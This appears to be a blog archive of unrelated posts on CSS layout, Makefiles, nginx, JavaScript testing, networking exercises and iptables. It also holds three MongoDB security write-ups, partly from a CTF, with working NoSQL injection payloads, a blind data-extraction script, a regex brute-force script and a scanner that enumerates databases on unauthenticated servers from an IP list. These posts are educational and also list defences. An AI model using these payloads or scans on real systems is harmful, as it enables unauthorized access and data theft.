一些历史

犹记得那个时候的学校首页是用table来布局的，一种很古老的布局方式。它用一系列复杂的嵌套的行跟列来标识Header、Navigation、Footer等等语义化的标签。这也是我后来了解到的很久以前开发者们在网页布局的方式。而当时自己模仿写的时候是采用了另外两种布局方式的，一种是流动式的布局，一种则是div 跟position的定位布局。

然而前端的变化发展很快，开发者们认为当今html应该更具语义化，为了日后项目维护的可持续和方便性。所以也就有了语义化的布局，不再是<div id="header">，或许这种更符合当今开发者们对html语义化的理解。

<body>
    <header><h1>Header</h1></header>
    <article>
        <h1>Title</h1>
        <p>balabala</p>
    </article>
    <aside><h1>Aside</h1></aside>
    <footer><h1>Footer</h1></footer>
</body>

又或者，如果你接触过很多css的framework，你可能听过grid这词，一种内嵌在框架中的栅格系统。最初自己接触到这词是在blueprint框架中，后来再次遇见是在 bootstrap中。前者只提供预定义宽度的列，而后者亦适用于流动式布局， 更侧重响应式、mobile-first。

/* blueprint */
.span-1 {width: 30px}
.span-2 {width: 70px}
.span-3 {width: 110px}
.span-4 {width: 150px}

/* bootstrap2 */
.span1 {width: 60px}
.row-fluid .span1 {
  width: 6.382978723404255%;
  *width: 6.329787234042553%;
}

如源码中所见，grids是为你预先定义好了固定宽度和媒体查询，你可以使用它所定义的这些类去布局。换句话说， 如果你想改变自己的布局你就需要相应的增删这些类名。

Susy

用过一段时间栅格系统后，我接触到了Susy。

Your MARKUP, YOUR DESIGN, YOUR OPINIONS | OUR MATH.

这是Susy官网的原话，很明显，Susy是完全根据开发者主观意想来为你构建不同grids的一种工具，这意味着你不再需要任何预先设定好的一系列的grids，你可以用susy自己来定义想要的grid，而且，它是完全分离css跟html的。 Susy有多简单？如果你用过compass，相信你会上手非常快。

比如我们构建一个最简单的页面，只包含content、sidebar和底部的gallery图标。

<div class="container">
    <div class="content">Content</div>
    <div class="sidebar">Sidebar</div>
</div>
<div class="footer">
    <div class="gallery">
        <ul>
            <li class="gallery-item"><img src="http://placehold.it/100x100" alt=""></li>
            <li class="gallery-item"><img src="http://placehold.it/100x100" alt=""></li>
            <li class="gallery-item"><img src="http://placehold.it/100x100" alt=""></li>
            <li class="gallery-item"><img src="http://placehold.it/100x100" alt=""></li>
            <li class="gallery-item"><img src="http://placehold.it/100x100" alt=""></li>
            <li class="gallery-item"><img src="http://placehold.it/100x100" alt=""></li>
            <li class="gallery-item"><img src="http://placehold.it/100x100" alt=""></li>
            <li class="gallery-item"><img src="http://placehold.it/100x100" alt=""></li>
        </ul>
    </div>
</div>

我们可以自己定义在最小屏幕分辨率600px下content和sidebar横向对齐，底部图标一横排开。而在手机页面则是content和 sidebar垂直挨着，底部图标呈两横四列。

你可能想到媒体查询，没错，我们来看看使用Susy会有多畅快。

$susy: ( column: 12);

.content {
    background-color: #fbeecb;
    @include breakpoint(600px) {
        @include span(8 of 12);
    }
}

.sidebar {
    background-color: #71dad2;
    @include breakpoint(600px) {
        @include span(4 of 12 last);
    }
}

.gallery {
    @include clearfix;
    background: black;
    padding: gutter();
    .gallery-item {
        @include gallery(2 of 8);
        margin-bottom: gutter(8);

        @include breakpoint(600px) {
            @include gallery(1 of 8);
            margin-bottom: 0;
        }
    }
}

抛开其他繁琐的问题，我们只关注Susy如何快速构建我们所要的布局，我们先声明了Susy全局默认下应该有12列，然后根据 breakpoint这个mixin来进行媒体查询。你可能疑惑breakpoint最后输出的媒体查询是什么样的。

@media (min-width: 600px) {
    .content {
        width: 66.10169%;
        float: left;
        margin-right: 1.69492%;
    }
}

没错，这就是我们预先定义最小屏幕分辨率下的媒体查询，然后我们使用span函数来声明content和sidebar分别占据的宽度， span(8 of 12)代表content占据整个12列宽度的8列，你可能会对of关键字感兴趣，实际上，Susy的这个函数还有许多关键字都有特定含义，比如at，last。Susy会自动帮你计算出特定条件下的宽度，当然它还拥有许多toolkit比如gallery。

如果你此时对Susy感兴趣，你可以移步官网去获取更多资源。实际上，接触Susy后我一直在使用Susy，当然你可能还需要去接触sass、compass 等等。

Flexbox

Susy面向传统的布局设计，你可以依靠它把各种浏览器兼容抛开。然而如果不讲兼容性，Flexbox绝对是大杀器。

Child elements in a flexbox can be laid out in any direction and can have flexible dimensions to adapt to the display space.

你可以在MDN上获取相关的文档。 拿一个含有header、article、sidebar和footer的页面来说，flexbox看起来是这样的。

<div id="container">
    <header>Header</header>
    <article>Article</article>
    <aside>Aside</aside>
    <footer>Footer</footer>
</div>

#container {
  display: -webkit-flex;
  display: flex;
  -webkit-flex-flow: row wrap;
  flex-flow: row wrap;
}
#container header, #container footer {
  -webkit-flex: 1 0 100%;
  flex: 1 0 100%;
}
#container header {
  background: #4dff4d;
}
#container footer {
  background: #ffffcc;
}
#container article {
  -webkit-flex: 2 1 30em;
  flex: 2 1 30em;
  background: #ff4dff;
}
#container aside {
  -webkit-flex: 1 0 15em;
  flex: 1 0 15em;
  background: #ccccff;
}

在Flexbox中，我们可以自动调整子元素的高和宽，来很好的填充任何显示设备中的可用显示空间，收缩内容防止内容溢出。

Summary

目前自己常用的是Susy，但相信未来Flexbox也将大放光彩。

Reference

build-web-layouts-easily-susy Using_css_flexible_boxes

If you ever use php with mongo, you may find a example showed in php-mongo manual, just like the code below:

<?php

$m = new MongoClient();
$db = $m->selectDB('test');
$collection = new MongoCollection($db, 'phpmanual');

$js = "function() {
    return this.name == 'Joe' || this.age == 50;
}";
$cursor = $collection->find(array('$where' => $js));
foreach ($cursor as $doc) {
    var_dump($doc);
}

?>

We can find that it allows us to search a collection using javascript code to reduce the resultset. And the mongo will call find() once you put a javascript function in a string to $where, the query result will return the document(s) if the function return true.

And our further progression is to make query dynamic to build a query system, maybe based on user input, something like get or post request. Imagine there is a query system for us to search someone through his name or nickname, we can construct the code like this:

$q = (isset($_GET['q']) ? $_GET['q'] : null);
if ($q) {
    $js = 'function(){if(this.name =='.'\''.$q.'\''.'||this.nick=='.'\''.$q.'\''.')return true;}';
}

Blind nosql injection

Just like the example showed above, we make our query dynamic, put our search in a get request and wrap the request with a single quotes. The thing goes well, just like a tradition sql query. However, not like the traditional sql injection 'or 1=1, the syntax and query in mongo is quite different. Hence, what we to do is to make the query in mongo return true, that means, create a true statement in query.

As the query function is about javascript, it's easy to make a true statement to let the function return true. We can guess the sql statement and input some datas like aaa||true or aaa'||true||'aaa to blind inject. Actually, the later works in our query system. And it will return every single document in our collection, just like the query db.collection.find(), because all of documents meet the query condition this.name='aaa'||true||'aaa'||this.nick=='aaa'||true||'aaa'.

See the true keyword? Yes, we can make more requests like this to get more information through the global variable db, such as db.getCollectionNames() bala bala. Yes, we can use such blind nosql injection to extract the entire contents of the mongo database.

The first attack is to ask how many collections are in the database. Like db.getCollectionNames().length == 1 and others. When we establish how many collections exist, our next step is to get each of collection information.

db.getCollectionNames()[0].length == 1;
db.getCollectionNames()[0].length == 2;
// ...
db.getCollectionNames()[0][0] == 'a';
db.getCollectionNames()[0][0] == 'b';
// ...

And extract all of the documents data in the collection.

// get all of the documents length
function getDocumentsLength(db, i) {
  var todo = 'tojson(db.' + db + '.find().toArray()).replace(/[ %5Ct%5Cr%5Cn]/gm, \'\').length == ' + i;
  var vul = '"%27||' + todo + '||%27';
  request.get(url + vul, function (err, res, body) {
    if (/<p>/.test(body)) {
      console.log(db + ' length: ' + i)
      getDoucments(db, i, 0, 0)
    } else {
      getDocumentsLength(db, ++i)
    }
  })
}

// extract the documents one by one
function getDoucments(db, length, i, num) {
  var todo = 'tojson(db.' + db + '.find().toArray()).replace(/[ %5Ct%5Cr%5Cn]/gm, \'\')[' + i + '].charCodeAt()==' + num;
  var vul = '"%27||' + todo + '||%27';
  request.get(url + vul, function (err, res, body) {
    if (/<p>/.test(body)) {
      if (i < length - 1) {
        var ret = String.fromCharCode(num);
        sys.print(ret);
        doc.push(ret);
        getDoucments(db, length, ++i, 0);
      } else {
        var ret = String.fromCharCode(num);
        sys.print(ret)
        doc.push(ret);
        console.log();
        getCollectionNameLength(++z, 0); // get other collection...
      }
    } else {
      getDoucments(db, length, i, ++num)
    }
  })
}

Actually, I put this vulnerable query system in hctf, the complete source code and payload is available in github.

Attention

This blind nosql injection is only available in versions of MongoDB prior to 2.4, because the global variable db was removed in 2.4.

End

If you have something to correct, welcome to point it out:D

References:

• nosql injection
• Server-Side JavaScript Injection
• Testing for NoSQL injection

In an early post I talked about traditional SQL injection and the defence. Actually, this classic attack is still wildly used in modern web applications. Not like traditional SQL, NoSQL like MongoDB eliminate the SQL language entirely and relay more on simple and structured query mechanism.

The SQL statement we used to query something like user login may like this in MongoDB:

db.users.find({user: username, pass: password});

We can see that it's no longer a query language in the form of a string, and we may think it can't be injected, and we may ignore the security of data, without check or filter. However, there are still many factors at play.

application/json

In HTTP 1.1, when post datas, header Content-Type has a MIME Type value called application/json, which will tell the server that the coming data is a JSON document. And some servers will know how to deal with the data. So what will happen if we post data like this:

{
    "username": {"$ne": ""},
    "password": {"$ne": ""}
}

If you use Express in node, your vulnerable code of the post request will look more or less like this:

app.use(require('body-parser').json()); // support application/json
app.post('/login', function (req, res) {
    db.users.find({user: req.body.username, pass: req.body.password}, function (err, users) {});
})

Actually, the result is we get this login bypass, that means, the nosql injection succeeds. So how it works? We post the username and password values a JSON document instead of a string, and the server-side receive the data without validation and parse it. In MongoDB, the field $ne has a special meaning, which is used as not equal to comparator. Hence, the username and password from the database will be compared to the empty string "" and the result will return true, just like the query in mongo shell below:

db.users.find({user: {"$ne":""}, pass: {$ne:""}})

OK, we just bypass the login using a JSON document, because the module body-parse used in Express supports json parse. In PHP, the data can't be operated directly, you should get the data from php://input, and then use json_decode to get object.

$input = file_get_contents("php://input");
$obj = json_decode($input); // and now we get the post obj
$cusor = $collection->find(array("user"=>$obj->username, "pass"=>$obj->password));

application/x-www-form-urlencoded

Actually, I use application/json to bypass the login above just for the clear explain about our nosql injection. And application/json is not used wildly, instead, we use application/x-www-form-urlencoded frequently. When we post data like this:

username[$ne]=''&password[$ne]=''

PHP will auto parse our data and the username and password field will be a array that contains the key $ne, and the inject happens. In Express, the string like username[$ne]='' will also be parsed by a module called qs, and the request will result into a javascript object like this:

{
    username: {$ne: ''},
    password: {$ne: ''}
}

It's the same as the object we used before, and the result is also the same. So we have got the login bypass already now. Actually, I enhance this nosql injection in hctf named lock(400). The source code of lock is available in github. I strongly recommend you should have a look about it.

Yeah, it's the same as something like login, but only the lock field is injectable and the password is hashed. However, we could get the information from source code comment that the key is the same as the lock. So our hack can be improved by using $regex in MongoDB.

lock[$regex]=''&pass=''

And now we can bruteforce it to get the correct password. The payload is below:

var request = require('request');
var util = require('util-crack');
var url = 'http://127.0.0.1:49090';
var ret = [];
var ret2 = [];

function LeftToRight (ret) {
  var s = util.random(null, 1);
  var lock = {"$regex": "^" + ret.join('') + s + "."}
  request.post(url, {form:{lock: lock, key: lock}}, function (err, res, body) {
    if (/Right/.test(body)) {
      ret.push(s);
      console.log('LeftToRight: ' + ret.join(''))
      LeftToRight(ret);
    } else {
      LeftToRight(ret);
    }
  });
}

function RightToLeft (ret2) {
  var s = util.random(null, 1);
  var lock = {"$regex": "." + s + ret2.join('') + "$"}
  request.post(url, {form:{lock: lock, key: lock}}, function (err, res, body) {
    if (/Right/.test(body)) {  
      ret2.unshift(s);
      console.log('RightToLeft: ' + ret2.join(''));
      RightToLeft(ret2);
    } else {
      RightToLeft(ret2);
    }
  });
}

LeftToRight(ret)
RightToLeft(ret2)

You can get the ultima right key and lock comparing the last LeftToRight and RightToLeft result.

End

So, we can see that it's easily get mongo injected if the server receive the data without any validation. Some measures can be available to defense such nosql inject attack.

• Make sure the coming data is expected, always validate the data that user input.
• Hash the sensitive data with salt.
• Check strictly if you really want the coming data special such as a JSON document. Maybe you can have a look about mongo-sanitize

If you have something to correct, welcome to point it out:D

References:

• Attacking NodeJS and MongoDB
• Hacking NodeJS and MongoDB
• Testing for NoSQL injection
• mime-type-list

NoSQL injection attacks may execute in different areas of an application than traditional SQL injection. Where SQL injection would execute within the database engine, NoSQL variants may execute during within the application layer or the database layer, depending on the NoSQL API used and data model. Typically NoSQL injection attacks will execute where the attack string is parsed, evaluated, or concatenated into a NoSQL API call.

There are now over 150 NoSQL databases available, and MongoDB is the most widely used NoSQL database. In a series of MongoDB Security articles, I will show different vulnerable applications, the code and payload is available in github.

For the first part, I would like to show the MongoDB unauthorized access vulnerability, which causes MongoDB information revealable because the MongoDB runned without the option --auth. And the revealable information may cause a series of other security problem.

As the payload may attackable, I only scan my servers for the example. And I write my payload as follow:

var file = "data",
    lineReader = require("line-reader"),
    mongoose = require('mongoose');

function conn (host, cb){
    var url = 'mongodb://' + host,
        options = { server: { socketOptions: { connectTimeoutMS: 4000 }}},
        connection = mongoose.createConnection(url, options);
        Admin = mongoose.mongo.Admin;
    connection.on('error', function(err) {
        if (err) throw new Error(err);
    });
    connection.on('open',function(){
        new Admin(connection.db).listDatabases(function (err, res) {
            if (err) throw new Error(err);
            res.databases.map(function (db) {
                console.log('[*] Database %s %s', db.name, db.sizeOnDisk);
                var db = mongoose.createConnection(url + '/' + db.name, options);
                db.on('open', function () {
                    db.db.collectionNames(function (err, res) {
                        if (err) throw new Error(err);
                        res.map(function (collection) {
                            console.log('[+] Collection %s', collection.name);
                        });
                        console.log();
                        db.close();
                        connection.close();
                    })
                })
            })
        })
        cb(host);
    });
}
lineReader.eachLine(file, function(line) {
    if (String(line)) {
        conn(line, function(host){
            console.log("Detected: " + host);
        });
    }
}).then(function () {
    console.log('[*] Read Done');
});

The payload scans a list of ip, and gets the unauthorized mongo server, what's more, for every unauthorized mongo server, I get their Databases and Collections to stress the importance of information leakage. The results for my server as follow:

[*] Read Done
Detected: xx.xx.xx.xx
[*] Database erciyuan 218103808
[*] Database shop 218103808
[*] Database admin 83886080
[*] Database test 1

[+] Collection admin.system.version
[+] Collection admin.system.indexes
[+] Collection admin.system.users

[+] Collection erciyuan.system.indexes
[+] Collection erciyuan.system.users
[+] Collection erciyuan.renwu
[+] Collection erciyuan.log

[+] Collection shop.system.indexes
[+] Collection shop.system.users
[+] Collection shop.users
[+] Collection shop.feedbacks
[+] Collection shop.baskets
[+] Collection shop.products

Detected: xx.xx.xx.xx
[*] Database vnwa 218103808
[*] Database admin 83886080
[*] Database test 1

[+] Collection admin.system.version
[+] Collection admin.system.indexes
[+] Collection admin.system.users

[+] Collection vnwa.system.indexes
[+] Collection vnwa.users
[+] Collection vnwa.messages

Besides, the HackerSoul scan almost 40000 IP list using MongoDB, and give us a report about this vulnerability.

[*] Start-date: 20141202-23:20
[*] End-date: 20141202-23:28
[*] Info
  [+] Target: 39818
  [+] Success: 7071
[*] Done

The results is crazy, hence, be sure to run your mongo with auth flag, or, change the mongo port( default is 27017) and start the firewall only allow the white-list ip to connect(something like iptables.

End

If you have something to correct, welcome to point it out:D

References:

• mongodb_unauthorized_access
• Testing for NoSQL injection

During my frontend time, I have seen some of tools to build frontend projects. Grunt, Gulp and so on. However, these tools often make me get in the way for its verbose configuration and long dependent plugins.

Why make

Actually, most of the tasks we need to build can be run using existing executables in the shell. Sass, Uglify, Unit test and so on have awesome executables already, what we need is just an easy way to run our commands to build projects without extra tooling and plugins. And Make comes to rescue.

What and how

GUN Make is a tool which controls the generation of executables and other non-sources files of a program from the program's source files.

Though make is perceived as being only for C projects, it is a general-purpose build tool that can be used on any kinds of projects. And in the case of a frontend build, make can help us construct dependency graph and execute some commands directly.

At begin, we need a file called Makefile. A Makefile consists of rules that has ite own specific purpose. Each of these rules has:

• a target, it can be a file or just a name
• prerequisites, an optional set of files the target depends on
• commands

And the syntax for a target is:

target: prerequisites
    commands

A Web project Makefile

Next, we will build a simple web project that uses Compass, jade. The contents of our source files are not important, what we concern is what we need to do with the files to make them ready to run.

At first, we should create package.json file to install the dependencies for this project, then run npm install. We could also achieve it in make.

{
  "dependencies": {
    "jade":    "1.9.2",
    "uglify-js":     "~2.4.0"
  }
}

NODE_MODULES = node_modules

install: package.json
    @npm install

Next, we may need to compile all jade templates which under the templates directory to the single file. Here is the sample.

template_js := templates/*.js
template_source := templates/*.jade

$(template_js): $(template_source)
    jade --client --no-debug $^

In first two lines, we use variables to define the source of our template, and in the recipe, we use jade --client command to render the source template file. $^ is a special make variable, which is a list of all the dependencies, separated with spaces. Next time, we need to concatenate our js file including runtime.js and jquery and minify it.

locals = js/locals.js
app_bundle := build/app.js
lib := vendor/jquery.js \
        node_modules/jade/runtime.js
uglifyjs := ./node_modules/uglify-js/bin/uglifyjs

$(app_bundle): $(lib) $(template_js) $(locals)
    $(uglifyjs) -cmo $@ $^

The locals.js is something about locals object and the $@ refers to the target. Besides, we can also compile our sass code.

scss_file := sass/*.scss
%.css: %.scss
    compass compile $(scss_file)

At last, we may add a .PHONY target, which is not really the name of a file, and tell the make not to find this file. What's more, when you run make without a target, the first entry is the one to run, usually named all by convention.

all: install $(app_bundle)
.PHONY: all

The whole Makefile looks like this:

uglifyjs := ./node_modules/uglify-js/bin/uglifyjs

app_bundle := build/app.js

locals = js/locals.js
template_js := templates/*.js
template_source := templates/*.jade
lib := vendor/jquery.js \
        node_modules/jade/runtime.js

scss_file := sass/*.scss
node_modules = node_modules

all: install $(app_bundle)

$(template_js): $(template_source)
    jade --client --no-debug $^

$(app_bundle): $(lib) $(template_js) $(locals)
    @$(uglifyjs) -cmo $@ $^

%.css: %.scss
    compass compile $(scss_file)

install: package.json
    @npm install

clean: 
    @rm -rf $(node_modules) $(template_js) $(app_bundle) $(scss_file)

.PHONY: all clean

Now we can create a web page to see the result.

<!DOCTYPE HTML>
<html>
    <head></head>
    <body>
        <script src="./build/app.js"></script>      
    </body>
</html>

Reference

• GNU Make Doc
• building-javascript-projects-with-make
• how-to-use-makefiles-in-your-web-projects
• make

Oh, it's time to note the fucking Codeigniter rewrite with Nginx, which will cause a 404 status to make you (╯°□°）╯︵ ┻━┻.

If you use Codeigniter, aka CI, you may know its fucking url rewrite with index.php. And the rewrite rules are for apache and not nginx. Hence, we should use nginx rewrite rules to get our site up and running.

Below is a section of my nginx.conf.

server {
    listen 80 default;
    server_name www.example.com example.com;

    root  /home/wwwroot/ci/;
    index index.php;

    location / {
        if ($request_filename !~ (index.php)) {  
            rewrite ^/(.*)$ /index.php?$1 last;  
        }  
    }

    location ~ .*.(php|php5)?$ {
        try_files $uri =404;
        fastcgi_pass  unix:/tmp/php-cgi.sock;
        fastcgi_index index.php;
        include fcgi.conf;
    }

    location ~ .*.(gif|jpg|jpeg|png|bmp|swf|ttf|svg|woff|eot)$ {
        expires      30d;
    }

    location ~ .*.(js|css)?$ {
        expires      12h;
    }

    access_log  /home/logs/ci_access.log  access;
    error_log /home/logs/ci_error.log;
}

End

If you have something to correct, welcome to point it out:D

References:

mocha && should.js

Mocha is a feature-rich JavaScript test framework running on node.js and the browser.

I used to use mocha for the elegant way it does async along with familiar BDD style syntax. And I worked mocha with should.js, which is a human assertion library.

Install

$ npm install mocha -g 
$ npm install should --save-dev

First Step

Let's say we have two api to test, and the api script is saved as api.js.

var Add_sync = exports.Add_sync = function () {};
var Add_async = exports.Add_async = function () {};
Add_sync.prototype.add = function (a, b) { return a + b; };
Add_async.prototype.add = function (a, b, cb) {
    setTimeout(function () {
        cb(a + b);
    }, 100);
}

Now we can check these two api's behavior right or not, save it as test/test.js.

var should = require('should');
var add_sync = require('../api.js').Add_sync;
var add_async = require('../api.js').Add_async;
describe('test api', function () {
    describe('sync add api', function () {
        it('should return 3', function () {
            var adder = new add_sync();
            adder.add(1, 2).should.equal(3);
        });
    });

    describe('async add api', function () {
        it('should callback with 3', function (done) {
            var adder = new add_async();
            adder.add(1, 2, function (res) {
                res.should.equal(3);
                done();
            });
        });
    });
});

Pay attention to testing asynchronous code that you should add a callback(usually named done) to it(). Mocha will know that it should wait for completion.

Besides, Mocha supports all hooks that is before(), after(), beforeEach(), afterEach(). We use within describe() at any nesting level, and use outside describe() for global scope.

Running the tests

By default mocha(1) will use the pattern ./test/*.js, so it's usually a good place to put your tests.

However, I prefer to set up a Makefile in the root of the project.

test:
    @./node_modules/.bin/mocha \
        --require should \
        --reporter dot \
        --bail \

.PHONY: test

Then we can just run our tests with $ make test. There are tons of options, visit mocha for more information.

Well, when refering to frontend tests, we focus more on Functional Tests. Sometimes we may just refresh-click-click-click and the testing is done. But how to do with some hudge javascript code on user interface or hundreds of refreshes and clicks? Hence, we still need something to automate test.

casper.js && phantomjs

Even though mocha also support browser, CasperJS is my favorite.

CasperJS, a toolkit on top of PhantomJS.

So let's begin with PhantomJS.

PhantomJS is a headless WebKit with Javascript API.

So what's headless? You most likely know what a browser is, now take away the GUI, that's called a headless browser. You can think of it as a programmable browser for the terminal. It's really cool!

And PhantomJS has fast and native support for various web standards like DOM handling, CSS selectors, JSON, Canvas and SVG. For me, I code with PhantomJS just like code with node!

However, PhantomJS itself is not a test framework, it is only used to launch the tests via a suitable test runner. Hence, CasperJS comes.

CasperJS is an open source navigation scripting and testing utility based on PhantomJS, also support SlimerJS(Gecko). So PhantomJS provides the headless browser capability, and CasperJS fills in the rest: it runs on top of Phantom with built in testing functionality allows for navigation scripting. Let's begin our frontend test!

Install on OSX

$ brew install phantomjs
$ brew install casperjs --devel

As CasperJS 1.1 branch is now pretty stable and supports testing utility, I choose this version to start.

Casper Test API

Now let's open up the /go/programmer subnode on v2ex, click the first topic link and confirm that we do the right operation.

casper.options.viewportSize = {width: 1024, height: 768};
var testCount = 2;
casper.test.begin("Testing V2EX", testCount, function suite (test) {
    casper.start("http://www.v2ex.com/go/programmer", function() {
        test.assertTitleMatch(/程序员/, "Title is what we'd expect");
        casper.click("a[href*='/t/']");
        casper.waitForUrl(/\/t\/*/, function() {
            test.assertExists(".topic_content", "Find the content");
            casper.capture("v2ex.png");  
        });
    }).run(function() {
        test.done();
    });
});

Here, after we click the first topic link, we wait for the url to change and the content of the first topic page to load. And capture the whole page and saved as v2ex.png. Actually, you can also wrap your follow-up codes in a then() callback in order to see the changes from your click event.

casper.then(function() {
    test.assertExists(".topic_content", "Find the content");
    casper.capture("v2ex2.png");
});

The then() callback staff is an implementation of the Promise Pattern. Hence, after calling other casper api like fill() and sendKeys(), you should wrap your next interaction in casper.then().

The fill() api is a convenient way to fill out and submit the form on web page.

casper.options.viewportSize = {width: 1024, height: 768};
var testCount = 3;
casper.test.begin("Searching V2EX", testCount, function suite(test) {
    casper.start("http://www.v2ex.com/", function() {
        casper.fill("form", {
            "q": "casper"
        }, false);
        casper.then(function () {
            this.evaluate(function () {
                dispatch(); // manually submit the form
            });
            casper.waitForPopup(/google\.com/, function () {
                this.test.assertEquals(this.popups.length, 1);
            })
            casper.withPopup(/google\.com/, function() {
                this.capture("search.png");
                test.assertTitleMatch(/Google/, "Title is right!");
                var value = this.evaluate(function () {
                    // we are in DOM!
                    return document.querySelector('input[name="q"]').value;
                });
                test.assertEquals(value, 'site:v2ex.com/t casper');
            });
        });
    }).run(function() {
        test.done();
    });
});

Here, as CasperJS can't submit the search form on v2ex, we should manually submit the form by call dispatch() function after fill the search input. We use evaluate() to run code in the current page DOM context(we are in DOM!). Then v2ex will popup a google hacking result for your search keywords, like site:v2ex.com/t casper here. So there we need waitForPopup and withPopup.

Actually, CasperJS has a fucking awesome doc that I strongly recommend you to read about it. You may need it when you stuck.

Summary

Unit tests are written from the developer’s perspective, and typically target a method or a class. While Functional tests are written from the user’s perspective, and usually test the interaction between multiple building blocks of the application. Your application would be better with both a comprehensive suite of Unit tests as well as a bunch of Functional tests.

Unit testing makes sure you are using quality ingredients. Functional testing makes sure your application doesn't taste like crap.

End

If you have something to correct, welcome to point it out:D

References:

• testing-in-nodejs-with-mocha
• functional-testing-casperjs

Chapter 1 problems:

Question 1:

Imagine that you have trained your St. Bernard, Bernie, to carry a box of three 8mm tapes instead of a flask of brandy. (When your disk fills up, you consider that an emergency.) These tapes each contain 7 gigabytes. The dog can travel to your side, wherever you may be, at 18 km/hour. For what range of distances does Bernie have a higher data rate than a transmission line whose data rate (excluding overhead) is 150 Mbps?

Answer:

The dog can carry 3 * 7 = 21 gigabytes (168 gigabits)
Speed = 18 km/hour = 0.005 km/sec
Distance: x km
Time: x / 0.005 = 200x sec
Hence, 168 / 200x Gbps or 840 / x Mbps.
For x < 5.6 km, the dog has higher rate than the communication line.

Question 6:

A client-server system uses a satellite network, with the satellite at a height of 40,000 km. What is the best-case delay in response to a request?

Answer:

Request distance: 40000 * 2 = 80000 km
Response distance: 40000 * 2 = 80000 km
Total distance: 80000 + 80000 = 160000 km
The speed of light: 300000 km/sec
Delay: 160000 / 300000 = 533 msec

Question 10:

A disadvantage of a broadcast subnet is the capacity wasted when multiple hosts attempt to access the channel at the same time. As a simplistic example, suppose that time is divided into discrete slots, with each of the n hosts attempting to use the channel with probability p during each slot. What fraction of the slots are wasted due to collisions?

Answer:

There are two situations without collisions.
1. Successful transmission. n * p * (1 - p) ^ (n - 1)
2. All stations are idle. (1 - p) ^ n
Hence, the fraction that are wasted is
1 - n * p * (1 - p) ^ (n - 1) - (1 - p) ^ n

Question 20:

A system has an n-layer protocol hierarchy. Applications generate messages of length M bytes. At each of the layers, an h-byte header is added. What fraction of the network bandwidth is filled with headers?

Answer:

The total number of header bytes: n * h
The total packet size: n * h + M
Hence, the fraction of each packet used by protocol header is 
[n * h / (M + n * h)]

Question 27:

How long was a bit on the original 802.3 standard in meters? Use a transmission speed of 10 Mbps and assume the propagation speed in coax is 2/3 the speed of light in vacuum.

Answer:

The speed of light in coax: 200000 km/sec (200 meter/μsec).
At 10Mbps, it takes 0.1μsec to transmit a bit.
0.1 * 200 = 20 meters.
Hence, a bit is 20 meters long here.

Question 28:

An image is 1024 x 768 pixels with 3 bytes/pixel. Assume the image is uncompressed. How long does it take to transmit it over a 56-kbps modem channel? Over a 1-Mbps cable modem? Over a 10-Mbps Ethernet? Over 100-Mbps Ethernet?

Answer:

The image is 1024 * 768 * 3 = 2359296 bytes = 18874368 bits
a. 56-kbps: 337.042 sec
b. 1-Mbps: 18.874 sec
c. 10-Mbps: 1.887 sec
d. 100-Mbps: 0.189 sec

Data and computer communication

Chapter 2 problems:

Question 2:

a.The French and Chinese prime ministers need to come to an agreement by telephone, but neither speaks the other’s language. Further, neither has on hand a translator that can translate to the language of the other. However, both prime ministers have English translators on their staffs. Draw a diagram similar to Figure 2.12 to depict the situation, and describe the interaction and each level.

b. Now suppose that the Chinese prime minister’s translator can translate only into Japanese and that the French prime minister has a German translator available. A translator between German and Japanese is available in Germany. Draw a new diagram that reflects this arrangement and describe the hypothetical phone conversation.

Answer:

a. Picture

----------------------           ----------------------
|Chinese prime ministers|        |French prime ministers|
-----------------------          ----------------------
|  Chinese Translator   |        |   French Translator  |
-----------------------          ----------------------
|        Telephone      |        |     Telephone        |
---------------------------------------------------------
                       Telephone Line
---------------------------------------------------------

b. Picture

----------------                           -----------------
|China  ministers|                         |French ministers |
 -----------------   -------------------    -----------------
|China Translator|  |Germany Translator |  |French Translator|
 -----------------   -------------------    -----------------
|   Telephone    |  |Telephone|Telephone|  |     Telephone   |
 ------------------------------------------------------------
  Chinese and German                        French and German
    Telephone Line                            Telephone Line
  ------------------                        -----------------

Question 3:

List the major disadvantages with the layered approach to protocols.

Answer:

The layered protocols may cause the processing and data overhead. And with so many layers, it takes a long time to develop and promulgate the standards.

Question 4:

Two blue armies are each poised on opposite hills preparing to attack a single red army in the valley. The red army can defeat either of the blue armies separately but will fail to defeat both blue armies if they attack simultaneously. The blue armies communicate via an unreliable communications system (a foot soldier). The commander with one of the blue armies would like to attack at noon. His problem is this: If he sends a message to the other blue army, ordering the attack, he cannot be sure it will get through. He could ask for acknowledgment, but that might not get through. Is there a protocol that the two blue armies can use to avoid defeat?

Answer:

No. There is no way to be assured that the last message gets through, except by acknowledging it.

What's iptables?

CentOS has a powerful firewall, that's called iptables, aka iptables/netfilter. It's the userscope module, and netfilter is a kernel module, built into the kernel, that actually does the filtering.

IPTables places rules into predefined chains(INPUT, OUTPUT and FORWORD) that are checked against any traffic(IP packets) relevant to those chains. And a decision is made about what to do with each packet based upon the outcome of those rules, for example, accepting or dropping.

Chains

There are 3 predefined chains in the filter table to which we can add rules for processing IP packets passing through those chains.

• INPUT - All packets destined for the host computer.
• OUTPUT - All packets originating from the host computer.
• FORWARD - All packets neither destined for nor originating the host, but passing through the host computer.

A packet is checked against each rule in turn, starting at the top, and if it matches the rule, then an action is taken such as accepting(ACCEPT) or dropping (DROP) the packet. Once a rule has been matched and an action taken, then the packet is processed according to the outcome of that rule and isn't processed by further rules in the chain.

Begin Start

We can use iptables -L to inspect the currently loaded rules. This is aliyun server, we can see the default set of rules. The default set seems that the firewall is the same as closed.

Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination

P.S. If iptables is not running, you can enable it by running:

# system-config-securitylevel

Server Setups

At first, I'll explain our server setups. We have 5 servers totally. And we use Load Balancer policy to setup our servers:

1. One Load Balancer Server(Reverse Proxy)
2. Three app-backend Servers
3. One Database Server

OK, it's time to go start. At first, we decide the following basic iptables policies. For Reverse Proxy server, we only open port 22 and 80, allowing tcp packets that have specific bits(flags) set, to match a rule. For three app-backend servers, we just open port 22 and 80. For database server, we open the port 22 and database port.

Set IPTables Rule (Load Balancer Server)

At first, we may add a rule allowing SSH connections over tcp port 22. This is to prevent accidental lockouts when working on remote systems over an SSH connection.

# iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT

And the same as HTTP connections over tcp port 80.

# iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT

Then we may allow all incoming packets destined for the localhost interface to be accepted. This is generally required as many software applications expect to be able to communicate with the localhost adaptor.

# iptables -A INPUT -i lo -j ACCEPT

